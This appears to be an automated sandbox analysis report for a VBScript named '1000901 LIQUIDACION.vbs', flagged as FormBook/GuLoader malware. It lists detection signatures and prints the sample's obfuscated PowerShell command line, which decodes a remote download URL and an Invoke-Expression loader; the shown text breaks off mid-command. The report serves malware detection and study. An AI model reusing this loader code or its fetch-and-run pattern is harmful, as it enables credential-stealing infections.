Edit tour
Windows
Analysis Report
1000901 LIQUIDACION.vbs
Overview
General Information
Detection
FormBook, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7408 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\10009 01 LIQUIDA CION.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7500 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Demonlan d = 1;$Pre decreeing= 'Substrin' ;$Predecre eing+='g'; Function H erremaend( $Sursdt){$ monuronsnt eranimate= $Sursdt.Le ngth-$Demo nland;For( $monurons= 5; $monuro ns -lt $mo nuronsnter animate; $ monurons+= (6)){$Alas kans+=$Sur sdt.$Prede creeing.In voke($monu rons, $Dem onland);}$ Alaskans;} function S urere($Adi pometer){. ($Disa ffirmative ) ($Adipom eter);}$Mo nostichic= Herremaend 'AristMDe .imo Sjakz Saks.ikort slSportlOm plaarelai/ Hiero5Addi t..plgk0T, aum An.ta( ProduWEqui .iGeniznIl debdPa.rao SnitwPick esAlleg ,e rsoNI,fanT Udpos drow n1Wighe0Ab bes.Unser0 Snoni;Pri o UtakWAfg ifi efugnS kal,6Casto 4Benin;R.s tb FresxTu rbu6Homog4 Radb;Roun d FurcrrVe bogv Matr: Famil1 Ast e2 Irre1Hv ede. Fa,u0 Un,er)Gumm i unmutG U .dveT lesc ArabkAdvo ,o A.ti/Re tor2Bi,le0 Taale1Folk e0Overs0Me de 1Calch0 Parti1H.an d FlintFPa rdoiNondir Nonvae Est ufD,teno H us.x Pers/ Murbr1Filb e2 lapu1b. udo. Un.e0 Straf ';$A pyonin182= Herremaend 'EksprUPa pirs,ingee SucrerSpec i-sk.ttASa mvigRevale AfkvinU ar mt.ofag '; $Halloffir e=Herremae nd 'Planoh FedetSpon ttKo,sip S idesNon,r: Speda/Efte r/Friskd K ar,rFacadi Qv.nsvSlid beAl,at.Bi falgDiloho Socio ,en ogSp.cilUn dereGlo i. ,nnac ret o AfstmGre pt/ PadauO v rgcForsk ?dyrebeFas cixLuftrp ,isco banf r F idtHuf fi=Chattd inusoTelef w NattnAft allTranco. anelaArbej d Send&Leg giiUnbludR ecla= Dunj 1Filmg3 O sts PellIB lokpDEurop g isanKUn oluTrafi2R edskDBuega 7Ol,giiP.i caIPosta6 AposzCa,ri R ParkxC,m poA ond4Ma caag SoupG Tr,jeYting sS DecoaIn iqusVoitu5 Ar,aniAl.r m0,asufm U lovh eriAA doptTUdfre B icca ';$ Startngles =Herremaen d 'Redak>P araf ';$Di saffirmati ve=Herrema end 'I ebl i Vil,e.np atxAdelo ' ;$Forfrdig et='Tented ';Surere ( Herremaend ' UlovSsw eepefeerst Tandk-Atta cCSpillode vionTryk.t SodeneProt enOpsentLa ves Dunc - A.prPUnde raSubmytSt al,hnondi ProtoTkun. t:H,lvt\ e busTFircie HusassSpyt stVesicuSt rogdRecipo Sugge. Vor ttHalvfx F ejetAutos Strue-Udsa gVkunsta C pmmlUdmatu Sadl.e fli n Hjemm$,a derFThromo Liv or e a afHulnirSt anddsennai ArkitgImmi geGlosetRu bbe;He er ');Surere (Herremaen d 'AlkyliM uddlfAlb i udpi(anti otAvissePl eursKbsvat Middl-Kron ip Tanda V ipetDu,tth zygne Gran dTLiche:Lu sk.\GruppT A skieSpin dsKantetBa jaduPirrid Hvedeo Gob l.Stra,tSa marxReg st Ultr)Glob a{Poly e e ostxHillbi SkubtRaad f} Sual;tr ise ');$Ti dsskriftsu dvlgelsern e = Herrem aend 'Shil le,lericRi sikhKaldeo Tjen L nj e%Ki,keaBr .dop Lendp BirthdNo.s paRevalt T iraasnebo% Do,e\Aast eMnyst.eFr ankd Tsari riskikAnna laWilmam,r fteeLamb n Be,hptR.tt oeSvveflCr i,i.VanddD Pro,odTops agDdska Ls erf&halss& Udl,s Tele